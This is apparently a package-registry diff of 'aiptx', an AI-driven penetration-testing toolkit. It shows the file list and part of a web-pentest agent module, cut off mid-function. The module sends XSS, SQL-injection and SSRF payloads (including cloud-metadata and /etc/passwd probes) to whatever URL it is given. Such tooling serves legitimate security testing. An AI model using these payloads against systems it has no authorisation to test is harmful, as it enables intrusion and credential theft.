aiptx 2.0.7__py3-none-any.whl
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- aipt_v2/__init__.py +110 -0
- aipt_v2/__main__.py +24 -0
- aipt_v2/agents/AIPTxAgent/__init__.py +10 -0
- aipt_v2/agents/AIPTxAgent/aiptx_agent.py +211 -0
- aipt_v2/agents/__init__.py +46 -0
- aipt_v2/agents/base.py +520 -0
- aipt_v2/agents/exploit_agent.py +688 -0
- aipt_v2/agents/ptt.py +406 -0
- aipt_v2/agents/state.py +168 -0
- aipt_v2/app.py +957 -0
- aipt_v2/browser/__init__.py +31 -0
- aipt_v2/browser/automation.py +458 -0
- aipt_v2/browser/crawler.py +453 -0
- aipt_v2/cli.py +2933 -0
- aipt_v2/compliance/__init__.py +71 -0
- aipt_v2/compliance/compliance_report.py +449 -0
- aipt_v2/compliance/framework_mapper.py +424 -0
- aipt_v2/compliance/nist_mapping.py +345 -0
- aipt_v2/compliance/owasp_mapping.py +330 -0
- aipt_v2/compliance/pci_mapping.py +297 -0
- aipt_v2/config.py +341 -0
- aipt_v2/core/__init__.py +43 -0
- aipt_v2/core/agent.py +630 -0
- aipt_v2/core/llm.py +395 -0
- aipt_v2/core/memory.py +305 -0
- aipt_v2/core/ptt.py +329 -0
- aipt_v2/database/__init__.py +14 -0
- aipt_v2/database/models.py +232 -0
- aipt_v2/database/repository.py +384 -0
- aipt_v2/docker/__init__.py +23 -0
- aipt_v2/docker/builder.py +260 -0
- aipt_v2/docker/manager.py +222 -0
- aipt_v2/docker/sandbox.py +371 -0
- aipt_v2/evasion/__init__.py +58 -0
- aipt_v2/evasion/request_obfuscator.py +272 -0
- aipt_v2/evasion/tls_fingerprint.py +285 -0
- aipt_v2/evasion/ua_rotator.py +301 -0
- aipt_v2/evasion/waf_bypass.py +439 -0
- aipt_v2/execution/__init__.py +23 -0
- aipt_v2/execution/executor.py +302 -0
- aipt_v2/execution/parser.py +544 -0
- aipt_v2/execution/terminal.py +337 -0
- aipt_v2/health.py +437 -0
- aipt_v2/intelligence/__init__.py +194 -0
- aipt_v2/intelligence/adaptation.py +474 -0
- aipt_v2/intelligence/auth.py +520 -0
- aipt_v2/intelligence/chaining.py +775 -0
- aipt_v2/intelligence/correlation.py +536 -0
- aipt_v2/intelligence/cve_aipt.py +334 -0
- aipt_v2/intelligence/cve_info.py +1111 -0
- aipt_v2/intelligence/knowledge_graph.py +590 -0
- aipt_v2/intelligence/learning.py +626 -0
- aipt_v2/intelligence/llm_analyzer.py +502 -0
- aipt_v2/intelligence/llm_tool_selector.py +518 -0
- aipt_v2/intelligence/payload_generator.py +562 -0
- aipt_v2/intelligence/rag.py +239 -0
- aipt_v2/intelligence/scope.py +442 -0
- aipt_v2/intelligence/searchers/__init__.py +5 -0
- aipt_v2/intelligence/searchers/exploitdb_searcher.py +523 -0
- aipt_v2/intelligence/searchers/github_searcher.py +467 -0
- aipt_v2/intelligence/searchers/google_searcher.py +281 -0
- aipt_v2/intelligence/tools.json +443 -0
- aipt_v2/intelligence/triage.py +670 -0
- aipt_v2/interactive_shell.py +559 -0
- aipt_v2/interface/__init__.py +5 -0
- aipt_v2/interface/cli.py +230 -0
- aipt_v2/interface/main.py +501 -0
- aipt_v2/interface/tui.py +1276 -0
- aipt_v2/interface/utils.py +583 -0
- aipt_v2/llm/__init__.py +39 -0
- aipt_v2/llm/config.py +26 -0
- aipt_v2/llm/llm.py +514 -0
- aipt_v2/llm/memory.py +214 -0
- aipt_v2/llm/request_queue.py +89 -0
- aipt_v2/llm/utils.py +89 -0
- aipt_v2/local_tool_installer.py +1467 -0
- aipt_v2/models/__init__.py +15 -0
- aipt_v2/models/findings.py +295 -0
- aipt_v2/models/phase_result.py +224 -0
- aipt_v2/models/scan_config.py +207 -0
- aipt_v2/monitoring/grafana/dashboards/aipt-dashboard.json +355 -0
- aipt_v2/monitoring/grafana/dashboards/default.yml +17 -0
- aipt_v2/monitoring/grafana/datasources/prometheus.yml +17 -0
- aipt_v2/monitoring/prometheus.yml +60 -0
- aipt_v2/orchestration/__init__.py +52 -0
- aipt_v2/orchestration/pipeline.py +398 -0
- aipt_v2/orchestration/progress.py +300 -0
- aipt_v2/orchestration/scheduler.py +296 -0
- aipt_v2/orchestrator.py +2427 -0
- aipt_v2/payloads/__init__.py +27 -0
- aipt_v2/payloads/cmdi.py +150 -0
- aipt_v2/payloads/sqli.py +263 -0
- aipt_v2/payloads/ssrf.py +204 -0
- aipt_v2/payloads/templates.py +222 -0
- aipt_v2/payloads/traversal.py +166 -0
- aipt_v2/payloads/xss.py +204 -0
- aipt_v2/prompts/__init__.py +60 -0
- aipt_v2/proxy/__init__.py +29 -0
- aipt_v2/proxy/history.py +352 -0
- aipt_v2/proxy/interceptor.py +452 -0
- aipt_v2/recon/__init__.py +44 -0
- aipt_v2/recon/dns.py +241 -0
- aipt_v2/recon/osint.py +367 -0
- aipt_v2/recon/subdomain.py +372 -0
- aipt_v2/recon/tech_detect.py +311 -0
- aipt_v2/reports/__init__.py +17 -0
- aipt_v2/reports/generator.py +313 -0
- aipt_v2/reports/html_report.py +378 -0
- aipt_v2/runtime/__init__.py +53 -0
- aipt_v2/runtime/base.py +30 -0
- aipt_v2/runtime/docker.py +401 -0
- aipt_v2/runtime/local.py +346 -0
- aipt_v2/runtime/tool_server.py +205 -0
- aipt_v2/runtime/vps.py +830 -0
- aipt_v2/scanners/__init__.py +28 -0
- aipt_v2/scanners/base.py +273 -0
- aipt_v2/scanners/nikto.py +244 -0
- aipt_v2/scanners/nmap.py +402 -0
- aipt_v2/scanners/nuclei.py +273 -0
- aipt_v2/scanners/web.py +454 -0
- aipt_v2/scripts/security_audit.py +366 -0
- aipt_v2/setup_wizard.py +941 -0
- aipt_v2/skills/__init__.py +80 -0
- aipt_v2/skills/agents/__init__.py +14 -0
- aipt_v2/skills/agents/api_tester.py +706 -0
- aipt_v2/skills/agents/base.py +477 -0
- aipt_v2/skills/agents/code_review.py +459 -0
- aipt_v2/skills/agents/security_agent.py +336 -0
- aipt_v2/skills/agents/web_pentest.py +818 -0
- aipt_v2/skills/prompts/__init__.py +647 -0
- aipt_v2/system_detector.py +539 -0
- aipt_v2/telemetry/__init__.py +7 -0
- aipt_v2/telemetry/tracer.py +347 -0
- aipt_v2/terminal/__init__.py +28 -0
- aipt_v2/terminal/executor.py +400 -0
- aipt_v2/terminal/sandbox.py +350 -0
- aipt_v2/tools/__init__.py +44 -0
- aipt_v2/tools/active_directory/__init__.py +78 -0
- aipt_v2/tools/active_directory/ad_config.py +238 -0
- aipt_v2/tools/active_directory/bloodhound_wrapper.py +447 -0
- aipt_v2/tools/active_directory/kerberos_attacks.py +430 -0
- aipt_v2/tools/active_directory/ldap_enum.py +533 -0
- aipt_v2/tools/active_directory/smb_attacks.py +505 -0
- aipt_v2/tools/agents_graph/__init__.py +19 -0
- aipt_v2/tools/agents_graph/agents_graph_actions.py +69 -0
- aipt_v2/tools/api_security/__init__.py +76 -0
- aipt_v2/tools/api_security/api_discovery.py +608 -0
- aipt_v2/tools/api_security/graphql_scanner.py +622 -0
- aipt_v2/tools/api_security/jwt_analyzer.py +577 -0
- aipt_v2/tools/api_security/openapi_fuzzer.py +761 -0
- aipt_v2/tools/browser/__init__.py +5 -0
- aipt_v2/tools/browser/browser_actions.py +238 -0
- aipt_v2/tools/browser/browser_instance.py +535 -0
- aipt_v2/tools/browser/tab_manager.py +344 -0
- aipt_v2/tools/cloud/__init__.py +70 -0
- aipt_v2/tools/cloud/cloud_config.py +273 -0
- aipt_v2/tools/cloud/cloud_scanner.py +639 -0
- aipt_v2/tools/cloud/prowler_tool.py +571 -0
- aipt_v2/tools/cloud/scoutsuite_tool.py +359 -0
- aipt_v2/tools/executor.py +307 -0
- aipt_v2/tools/parser.py +408 -0
- aipt_v2/tools/proxy/__init__.py +5 -0
- aipt_v2/tools/proxy/proxy_actions.py +103 -0
- aipt_v2/tools/proxy/proxy_manager.py +789 -0
- aipt_v2/tools/registry.py +196 -0
- aipt_v2/tools/scanners/__init__.py +343 -0
- aipt_v2/tools/scanners/acunetix_tool.py +712 -0
- aipt_v2/tools/scanners/burp_tool.py +631 -0
- aipt_v2/tools/scanners/config.py +156 -0
- aipt_v2/tools/scanners/nessus_tool.py +588 -0
- aipt_v2/tools/scanners/zap_tool.py +612 -0
- aipt_v2/tools/terminal/__init__.py +5 -0
- aipt_v2/tools/terminal/terminal_actions.py +37 -0
- aipt_v2/tools/terminal/terminal_manager.py +153 -0
- aipt_v2/tools/terminal/terminal_session.py +449 -0
- aipt_v2/tools/tool_processing.py +108 -0
- aipt_v2/utils/__init__.py +17 -0
- aipt_v2/utils/logging.py +202 -0
- aipt_v2/utils/model_manager.py +187 -0
- aipt_v2/utils/searchers/__init__.py +269 -0
- aipt_v2/verify_install.py +793 -0
- aiptx-2.0.7.dist-info/METADATA +345 -0
- aiptx-2.0.7.dist-info/RECORD +187 -0
- aiptx-2.0.7.dist-info/WHEEL +5 -0
- aiptx-2.0.7.dist-info/entry_points.txt +7 -0
- aiptx-2.0.7.dist-info/licenses/LICENSE +21 -0
- aiptx-2.0.7.dist-info/top_level.txt +1 -0
|
@@ -0,0 +1,818 @@
|
|
|
1
|
+
"""
|
|
2
|
+
Web Penetration Testing Agent - AI-powered web application security assessment.
|
|
3
|
+
|
|
4
|
+
Performs comprehensive web application penetration testing including:
|
|
5
|
+
- Reconnaissance and information gathering
|
|
6
|
+
- Vulnerability scanning (XSS, SQLi, SSRF, etc.)
|
|
7
|
+
- Authentication and session testing
|
|
8
|
+
- Business logic testing
|
|
9
|
+
- Client-side security assessment
|
|
10
|
+
"""
|
|
11
|
+
|
|
12
|
+
import json
|
|
13
|
+
import re
|
|
14
|
+
import time
|
|
15
|
+
from typing import Any, Dict, List, Optional, Set
|
|
16
|
+
from urllib.parse import urljoin, urlparse, parse_qs
|
|
17
|
+
|
|
18
|
+
import structlog
|
|
19
|
+
|
|
20
|
+
from aipt_v2.skills.agents.base import (
|
|
21
|
+
AgentConfig,
|
|
22
|
+
AgentResult,
|
|
23
|
+
BaseSecurityAgent,
|
|
24
|
+
Finding,
|
|
25
|
+
Severity,
|
|
26
|
+
VulnCategory,
|
|
27
|
+
register_tool,
|
|
28
|
+
)
|
|
29
|
+
from aipt_v2.skills.prompts import SkillPrompts, VULNERABILITY_PROMPTS
|
|
30
|
+
|
|
31
|
+
logger = structlog.get_logger()
|
|
32
|
+
|
|
33
|
+
|
|
34
|
+
# Shared HTTP client
|
|
35
|
+
_http_client = None
|
|
36
|
+
|
|
37
|
+
|
|
38
|
+
def get_http_client():
|
|
39
|
+
"""Get or create HTTP client."""
|
|
40
|
+
global _http_client
|
|
41
|
+
if _http_client is None:
|
|
42
|
+
import httpx
|
|
43
|
+
_http_client = httpx.AsyncClient(
|
|
44
|
+
timeout=30.0,
|
|
45
|
+
follow_redirects=True,
|
|
46
|
+
verify=False
|
|
47
|
+
)
|
|
48
|
+
return _http_client
|
|
49
|
+
|
|
50
|
+
|
|
51
|
+
# Register web pentest tools
|
|
52
|
+
@register_tool(
|
|
53
|
+
name="fetch_page",
|
|
54
|
+
description="Fetch a web page and return HTML content with analysis",
|
|
55
|
+
parameters={
|
|
56
|
+
"url": {"type": "string", "description": "URL to fetch"},
|
|
57
|
+
"headers": {"type": "object", "description": "Optional headers"},
|
|
58
|
+
"method": {"type": "string", "description": "HTTP method (default: GET)"}
|
|
59
|
+
},
|
|
60
|
+
category="web_pentest"
|
|
61
|
+
)
|
|
62
|
+
async def fetch_page(
|
|
63
|
+
url: str,
|
|
64
|
+
headers: Optional[Dict[str, str]] = None,
|
|
65
|
+
method: str = "GET"
|
|
66
|
+
) -> str:
|
|
67
|
+
"""Fetch a web page."""
|
|
68
|
+
try:
|
|
69
|
+
client = get_http_client()
|
|
70
|
+
response = await client.request(method=method, url=url, headers=headers)
|
|
71
|
+
|
|
72
|
+
# Analyze the page
|
|
73
|
+
content_type = response.headers.get("content-type", "")
|
|
74
|
+
security_headers = {
|
|
75
|
+
"X-Frame-Options": response.headers.get("x-frame-options", "MISSING"),
|
|
76
|
+
"X-Content-Type-Options": response.headers.get("x-content-type-options", "MISSING"),
|
|
77
|
+
"X-XSS-Protection": response.headers.get("x-xss-protection", "MISSING"),
|
|
78
|
+
"Content-Security-Policy": response.headers.get("content-security-policy", "MISSING")[:100] if response.headers.get("content-security-policy") else "MISSING",
|
|
79
|
+
"Strict-Transport-Security": response.headers.get("strict-transport-security", "MISSING"),
|
|
80
|
+
}
|
|
81
|
+
|
|
82
|
+
# Extract forms and inputs
|
|
83
|
+
html = response.text
|
|
84
|
+
forms = re.findall(r'<form[^>]*>(.*?)</form>', html, re.DOTALL | re.IGNORECASE)
|
|
85
|
+
inputs = re.findall(r'<input[^>]*>', html, re.IGNORECASE)
|
|
86
|
+
links = re.findall(r'href=["\']([^"\']+)["\']', html, re.IGNORECASE)
|
|
87
|
+
scripts = re.findall(r'<script[^>]*>(.*?)</script>', html, re.DOTALL | re.IGNORECASE)
|
|
88
|
+
|
|
89
|
+
# Find potential injection points
|
|
90
|
+
params_in_url = parse_qs(urlparse(url).query)
|
|
91
|
+
|
|
92
|
+
result = f"""Page: {url}
|
|
93
|
+
Status: {response.status_code}
|
|
94
|
+
Content-Type: {content_type}
|
|
95
|
+
|
|
96
|
+
=== SECURITY HEADERS ===
|
|
97
|
+
{json.dumps(security_headers, indent=2)}
|
|
98
|
+
|
|
99
|
+
=== FORMS ({len(forms)}) ===
|
|
100
|
+
{chr(10).join([f[:500] for f in forms[:5]])}
|
|
101
|
+
|
|
102
|
+
=== INPUT FIELDS ({len(inputs)}) ===
|
|
103
|
+
{chr(10).join(inputs[:20])}
|
|
104
|
+
|
|
105
|
+
=== LINKS ({len(links)}) ===
|
|
106
|
+
{chr(10).join(links[:30])}
|
|
107
|
+
|
|
108
|
+
=== URL PARAMETERS ===
|
|
109
|
+
{json.dumps(params_in_url, indent=2) if params_in_url else "None"}
|
|
110
|
+
|
|
111
|
+
=== INLINE SCRIPTS ({len(scripts)}) ===
|
|
112
|
+
{len(scripts)} script blocks found
|
|
113
|
+
|
|
114
|
+
=== RESPONSE BODY (truncated) ===
|
|
115
|
+
{html[:3000]}"""
|
|
116
|
+
|
|
117
|
+
return result
|
|
118
|
+
|
|
119
|
+
except Exception as e:
|
|
120
|
+
return f"Failed to fetch page: {str(e)}"
|
|
121
|
+
|
|
122
|
+
|
|
123
|
+
@register_tool(
|
|
124
|
+
name="spider_site",
|
|
125
|
+
description="Spider a website to discover pages and endpoints",
|
|
126
|
+
parameters={
|
|
127
|
+
"start_url": {"type": "string", "description": "Starting URL to spider"},
|
|
128
|
+
"max_pages": {"type": "integer", "description": "Maximum pages to crawl (default: 50)"},
|
|
129
|
+
"same_domain": {"type": "boolean", "description": "Only crawl same domain (default: true)"}
|
|
130
|
+
},
|
|
131
|
+
category="web_pentest"
|
|
132
|
+
)
|
|
133
|
+
async def spider_site(
|
|
134
|
+
start_url: str,
|
|
135
|
+
max_pages: int = 50,
|
|
136
|
+
same_domain: bool = True
|
|
137
|
+
) -> str:
|
|
138
|
+
"""Spider a website to discover URLs."""
|
|
139
|
+
try:
|
|
140
|
+
import asyncio
|
|
141
|
+
client = get_http_client()
|
|
142
|
+
|
|
143
|
+
visited: Set[str] = set()
|
|
144
|
+
to_visit: List[str] = [start_url]
|
|
145
|
+
found_urls: List[Dict[str, Any]] = []
|
|
146
|
+
forms_found: List[Dict[str, Any]] = []
|
|
147
|
+
|
|
148
|
+
base_domain = urlparse(start_url).netloc
|
|
149
|
+
|
|
150
|
+
while to_visit and len(visited) < max_pages:
|
|
151
|
+
url = to_visit.pop(0)
|
|
152
|
+
|
|
153
|
+
if url in visited:
|
|
154
|
+
continue
|
|
155
|
+
|
|
156
|
+
try:
|
|
157
|
+
parsed = urlparse(url)
|
|
158
|
+
if same_domain and parsed.netloc != base_domain:
|
|
159
|
+
continue
|
|
160
|
+
|
|
161
|
+
visited.add(url)
|
|
162
|
+
response = await client.get(url, follow_redirects=True)
|
|
163
|
+
|
|
164
|
+
# Record URL with metadata
|
|
165
|
+
found_urls.append({
|
|
166
|
+
"url": url,
|
|
167
|
+
"status": response.status_code,
|
|
168
|
+
"content_type": response.headers.get("content-type", "unknown"),
|
|
169
|
+
"params": bool(parse_qs(parsed.query))
|
|
170
|
+
})
|
|
171
|
+
|
|
172
|
+
# Extract links
|
|
173
|
+
html = response.text
|
|
174
|
+
links = re.findall(r'href=["\']([^"\'#]+)["\']', html, re.IGNORECASE)
|
|
175
|
+
|
|
176
|
+
for link in links:
|
|
177
|
+
full_url = urljoin(url, link)
|
|
178
|
+
if full_url not in visited and full_url not in to_visit:
|
|
179
|
+
to_visit.append(full_url)
|
|
180
|
+
|
|
181
|
+
# Extract forms
|
|
182
|
+
form_matches = re.findall(r'<form[^>]*action=["\']([^"\']*)["\'][^>]*>(.*?)</form>', html, re.DOTALL | re.IGNORECASE)
|
|
183
|
+
for action, form_content in form_matches:
|
|
184
|
+
inputs = re.findall(r'<input[^>]*name=["\']([^"\']+)["\'][^>]*>', form_content, re.IGNORECASE)
|
|
185
|
+
forms_found.append({
|
|
186
|
+
"page": url,
|
|
187
|
+
"action": urljoin(url, action) if action else url,
|
|
188
|
+
"inputs": inputs
|
|
189
|
+
})
|
|
190
|
+
|
|
191
|
+
await asyncio.sleep(0.1) # Rate limiting
|
|
192
|
+
|
|
193
|
+
except Exception as e:
|
|
194
|
+
found_urls.append({"url": url, "error": str(e)})
|
|
195
|
+
|
|
196
|
+
# Format results
|
|
197
|
+
result = f"""Spider Results for {start_url}
|
|
198
|
+
Total URLs discovered: {len(found_urls)}
|
|
199
|
+
Forms found: {len(forms_found)}
|
|
200
|
+
|
|
201
|
+
=== URLS WITH PARAMETERS (High Priority) ===
|
|
202
|
+
"""
|
|
203
|
+
urls_with_params = [u for u in found_urls if u.get("params")]
|
|
204
|
+
for u in urls_with_params:
|
|
205
|
+
result += f" {u['url']}\n"
|
|
206
|
+
|
|
207
|
+
result += f"""
|
|
208
|
+
=== FORMS (Injection Targets) ===
|
|
209
|
+
"""
|
|
210
|
+
for f in forms_found:
|
|
211
|
+
result += f" Action: {f['action']}\n"
|
|
212
|
+
result += f" Inputs: {', '.join(f['inputs'])}\n\n"
|
|
213
|
+
|
|
214
|
+
result += f"""
|
|
215
|
+
=== ALL DISCOVERED URLS ===
|
|
216
|
+
"""
|
|
217
|
+
for u in found_urls:
|
|
218
|
+
if "error" in u:
|
|
219
|
+
result += f" ERROR: {u['url']} - {u['error']}\n"
|
|
220
|
+
else:
|
|
221
|
+
result += f" [{u['status']}] {u['url']}\n"
|
|
222
|
+
|
|
223
|
+
return result
|
|
224
|
+
|
|
225
|
+
except Exception as e:
|
|
226
|
+
return f"Spidering failed: {str(e)}"
|
|
227
|
+
|
|
228
|
+
|
|
229
|
+
@register_tool(
|
|
230
|
+
name="test_xss",
|
|
231
|
+
description="Test a URL/parameter for XSS vulnerabilities",
|
|
232
|
+
parameters={
|
|
233
|
+
"url": {"type": "string", "description": "URL to test"},
|
|
234
|
+
"param": {"type": "string", "description": "Parameter name to inject into"},
|
|
235
|
+
"method": {"type": "string", "description": "GET or POST (default: GET)"}
|
|
236
|
+
},
|
|
237
|
+
category="web_pentest"
|
|
238
|
+
)
|
|
239
|
+
async def test_xss(url: str, param: str, method: str = "GET") -> str:
|
|
240
|
+
"""Test for XSS vulnerabilities."""
|
|
241
|
+
try:
|
|
242
|
+
client = get_http_client()
|
|
243
|
+
|
|
244
|
+
payloads = [
|
|
245
|
+
"<script>alert('XSS')</script>",
|
|
246
|
+
"<img src=x onerror=alert('XSS')>",
|
|
247
|
+
"<svg onload=alert('XSS')>",
|
|
248
|
+
"javascript:alert('XSS')",
|
|
249
|
+
"'\"><script>alert('XSS')</script>",
|
|
250
|
+
"<body onload=alert('XSS')>",
|
|
251
|
+
"'-alert('XSS')-'",
|
|
252
|
+
"\"><img src=x onerror=alert('XSS')>",
|
|
253
|
+
]
|
|
254
|
+
|
|
255
|
+
results = []
|
|
256
|
+
import asyncio
|
|
257
|
+
|
|
258
|
+
for payload in payloads:
|
|
259
|
+
try:
|
|
260
|
+
if method.upper() == "GET":
|
|
261
|
+
test_url = f"{url}?{param}={payload}" if "?" not in url else f"{url}&{param}={payload}"
|
|
262
|
+
response = await client.get(test_url)
|
|
263
|
+
else:
|
|
264
|
+
response = await client.post(url, data={param: payload})
|
|
265
|
+
|
|
266
|
+
# Check if payload is reflected
|
|
267
|
+
reflected = payload in response.text or payload.replace("'", "'") in response.text
|
|
268
|
+
|
|
269
|
+
# Check for basic sanitization
|
|
270
|
+
sanitized = "<script>" in response.text or "<img" in response.text
|
|
271
|
+
|
|
272
|
+
results.append({
|
|
273
|
+
"payload": payload,
|
|
274
|
+
"reflected": reflected,
|
|
275
|
+
"sanitized": sanitized,
|
|
276
|
+
"status": response.status_code,
|
|
277
|
+
"vulnerable": reflected and not sanitized
|
|
278
|
+
})
|
|
279
|
+
|
|
280
|
+
await asyncio.sleep(0.1)
|
|
281
|
+
|
|
282
|
+
except Exception as e:
|
|
283
|
+
results.append({"payload": payload, "error": str(e)})
|
|
284
|
+
|
|
285
|
+
# Format results
|
|
286
|
+
vulnerable = [r for r in results if r.get("vulnerable")]
|
|
287
|
+
|
|
288
|
+
output = f"""XSS Testing: {url}
|
|
289
|
+
Parameter: {param}
|
|
290
|
+
Method: {method}
|
|
291
|
+
|
|
292
|
+
"""
|
|
293
|
+
if vulnerable:
|
|
294
|
+
output += "🚨 VULNERABLE TO XSS!\n\n"
|
|
295
|
+
output += "=== SUCCESSFUL PAYLOADS ===\n"
|
|
296
|
+
for r in vulnerable:
|
|
297
|
+
output += f" {r['payload']}\n"
|
|
298
|
+
else:
|
|
299
|
+
output += "No direct XSS found (may need context-specific payloads)\n"
|
|
300
|
+
|
|
301
|
+
output += "\n=== ALL RESULTS ===\n"
|
|
302
|
+
for r in results:
|
|
303
|
+
if "error" in r:
|
|
304
|
+
output += f" {r['payload']}: Error\n"
|
|
305
|
+
else:
|
|
306
|
+
status = "VULNERABLE" if r.get("vulnerable") else ("Reflected but sanitized" if r.get("reflected") else "Not reflected")
|
|
307
|
+
output += f" {r['payload']}: {status}\n"
|
|
308
|
+
|
|
309
|
+
return output
|
|
310
|
+
|
|
311
|
+
except Exception as e:
|
|
312
|
+
return f"XSS testing failed: {str(e)}"
|
|
313
|
+
|
|
314
|
+
|
|
315
|
+
@register_tool(
|
|
316
|
+
name="test_sqli",
|
|
317
|
+
description="Test a URL/parameter for SQL injection",
|
|
318
|
+
parameters={
|
|
319
|
+
"url": {"type": "string", "description": "URL to test"},
|
|
320
|
+
"param": {"type": "string", "description": "Parameter name to test"},
|
|
321
|
+
"method": {"type": "string", "description": "GET or POST"}
|
|
322
|
+
},
|
|
323
|
+
category="web_pentest"
|
|
324
|
+
)
|
|
325
|
+
async def test_sqli(url: str, param: str, method: str = "GET") -> str:
|
|
326
|
+
"""Test for SQL injection vulnerabilities."""
|
|
327
|
+
try:
|
|
328
|
+
client = get_http_client()
|
|
329
|
+
import asyncio
|
|
330
|
+
|
|
331
|
+
# Error-based payloads
|
|
332
|
+
payloads = [
|
|
333
|
+
("'", "Single quote"),
|
|
334
|
+
("\"", "Double quote"),
|
|
335
|
+
("' OR '1'='1", "OR bypass"),
|
|
336
|
+
("' OR '1'='1'--", "OR bypass with comment"),
|
|
337
|
+
("1' AND '1'='1", "AND true"),
|
|
338
|
+
("1' AND '1'='2", "AND false"),
|
|
339
|
+
("' UNION SELECT NULL--", "UNION"),
|
|
340
|
+
("1; SELECT 1--", "Stacked query"),
|
|
341
|
+
("' OR SLEEP(5)--", "Time-based MySQL"),
|
|
342
|
+
("'; WAITFOR DELAY '0:0:5'--", "Time-based MSSQL"),
|
|
343
|
+
]
|
|
344
|
+
|
|
345
|
+
results = []
|
|
346
|
+
baseline_length = None
|
|
347
|
+
baseline_time = None
|
|
348
|
+
|
|
349
|
+
# Get baseline
|
|
350
|
+
try:
|
|
351
|
+
start = time.time()
|
|
352
|
+
if method.upper() == "GET":
|
|
353
|
+
response = await client.get(f"{url}?{param}=1")
|
|
354
|
+
else:
|
|
355
|
+
response = await client.post(url, data={param: "1"})
|
|
356
|
+
baseline_time = time.time() - start
|
|
357
|
+
baseline_length = len(response.text)
|
|
358
|
+
except Exception:
|
|
359
|
+
pass
|
|
360
|
+
|
|
361
|
+
for payload, description in payloads:
|
|
362
|
+
try:
|
|
363
|
+
start = time.time()
|
|
364
|
+
|
|
365
|
+
if method.upper() == "GET":
|
|
366
|
+
test_url = f"{url}?{param}={payload}"
|
|
367
|
+
response = await client.get(test_url)
|
|
368
|
+
else:
|
|
369
|
+
response = await client.post(url, data={param: payload})
|
|
370
|
+
|
|
371
|
+
elapsed = time.time() - start
|
|
372
|
+
|
|
373
|
+
# Check for SQL errors
|
|
374
|
+
sql_errors = [
|
|
375
|
+
"sql syntax", "mysql", "sqlite", "postgresql", "oracle",
|
|
376
|
+
"microsoft sql", "odbc", "jdbc", "sql error", "syntax error",
|
|
377
|
+
"unterminated", "quoted string", "invalid query"
|
|
378
|
+
]
|
|
379
|
+
error_found = any(err in response.text.lower() for err in sql_errors)
|
|
380
|
+
|
|
381
|
+
# Check for time-based injection
|
|
382
|
+
time_based = elapsed > (baseline_time or 1) + 4 if baseline_time else elapsed > 5
|
|
383
|
+
|
|
384
|
+
# Check for boolean-based (response length difference)
|
|
385
|
+
length_diff = abs(len(response.text) - baseline_length) if baseline_length else 0
|
|
386
|
+
|
|
387
|
+
results.append({
|
|
388
|
+
"payload": payload,
|
|
389
|
+
"description": description,
|
|
390
|
+
"status": response.status_code,
|
|
391
|
+
"error_based": error_found,
|
|
392
|
+
"time_based": time_based,
|
|
393
|
+
"time": elapsed,
|
|
394
|
+
"length": len(response.text),
|
|
395
|
+
"length_diff": length_diff
|
|
396
|
+
})
|
|
397
|
+
|
|
398
|
+
await asyncio.sleep(0.2)
|
|
399
|
+
|
|
400
|
+
except Exception as e:
|
|
401
|
+
results.append({"payload": payload, "error": str(e)})
|
|
402
|
+
|
|
403
|
+
# Analyze results
|
|
404
|
+
vulnerable = [r for r in results if r.get("error_based") or r.get("time_based")]
|
|
405
|
+
|
|
406
|
+
output = f"""SQL Injection Testing: {url}
|
|
407
|
+
Parameter: {param}
|
|
408
|
+
Method: {method}
|
|
409
|
+
Baseline response length: {baseline_length}
|
|
410
|
+
Baseline response time: {baseline_time:.2f}s
|
|
411
|
+
|
|
412
|
+
"""
|
|
413
|
+
if vulnerable:
|
|
414
|
+
output += "🚨 POTENTIALLY VULNERABLE TO SQL INJECTION!\n\n"
|
|
415
|
+
output += "=== INDICATORS ===\n"
|
|
416
|
+
for r in vulnerable:
|
|
417
|
+
indicator = "Error-based" if r.get("error_based") else "Time-based"
|
|
418
|
+
output += f" {r['description']}: {indicator}\n"
|
|
419
|
+
output += f" Payload: {r['payload']}\n"
|
|
420
|
+
|
|
421
|
+
output += "\n=== ALL RESULTS ===\n"
|
|
422
|
+
for r in results:
|
|
423
|
+
if "error" in r:
|
|
424
|
+
output += f" {r['description']}: Error - {r['error']}\n"
|
|
425
|
+
else:
|
|
426
|
+
indicators = []
|
|
427
|
+
if r.get("error_based"):
|
|
428
|
+
indicators.append("SQL Error")
|
|
429
|
+
if r.get("time_based"):
|
|
430
|
+
indicators.append(f"Delayed ({r['time']:.1f}s)")
|
|
431
|
+
if r.get("length_diff", 0) > 100:
|
|
432
|
+
indicators.append(f"Length diff: {r['length_diff']}")
|
|
433
|
+
|
|
434
|
+
status = ", ".join(indicators) if indicators else "No indicators"
|
|
435
|
+
output += f" {r['description']}: {status}\n"
|
|
436
|
+
|
|
437
|
+
return output
|
|
438
|
+
|
|
439
|
+
except Exception as e:
|
|
440
|
+
return f"SQLi testing failed: {str(e)}"
|
|
441
|
+
|
|
442
|
+
|
|
443
|
+
@register_tool(
|
|
444
|
+
name="test_ssrf",
|
|
445
|
+
description="Test for SSRF vulnerabilities",
|
|
446
|
+
parameters={
|
|
447
|
+
"url": {"type": "string", "description": "URL with parameter to test"},
|
|
448
|
+
"param": {"type": "string", "description": "URL parameter name"},
|
|
449
|
+
"callback_url": {"type": "string", "description": "Your callback URL for OOB detection (optional)"}
|
|
450
|
+
},
|
|
451
|
+
category="web_pentest"
|
|
452
|
+
)
|
|
453
|
+
async def test_ssrf(url: str, param: str, callback_url: Optional[str] = None) -> str:
|
|
454
|
+
"""Test for SSRF vulnerabilities."""
|
|
455
|
+
try:
|
|
456
|
+
client = get_http_client()
|
|
457
|
+
import asyncio
|
|
458
|
+
|
|
459
|
+
ssrf_payloads = [
|
|
460
|
+
("http://127.0.0.1", "Localhost"),
|
|
461
|
+
("http://localhost", "Localhost hostname"),
|
|
462
|
+
("http://[::1]", "IPv6 localhost"),
|
|
463
|
+
("http://0.0.0.0", "Zero address"),
|
|
464
|
+
("http://169.254.169.254/latest/meta-data/", "AWS metadata"),
|
|
465
|
+
("http://metadata.google.internal/", "GCP metadata"),
|
|
466
|
+
("http://169.254.169.254/metadata/instance", "Azure metadata"),
|
|
467
|
+
("file:///etc/passwd", "File protocol"),
|
|
468
|
+
("http://127.0.0.1:22", "SSH port"),
|
|
469
|
+
("http://127.0.0.1:3306", "MySQL port"),
|
|
470
|
+
]
|
|
471
|
+
|
|
472
|
+
if callback_url:
|
|
473
|
+
ssrf_payloads.append((callback_url, "OOB Callback"))
|
|
474
|
+
|
|
475
|
+
results = []
|
|
476
|
+
|
|
477
|
+
for payload, description in ssrf_payloads:
|
|
478
|
+
try:
|
|
479
|
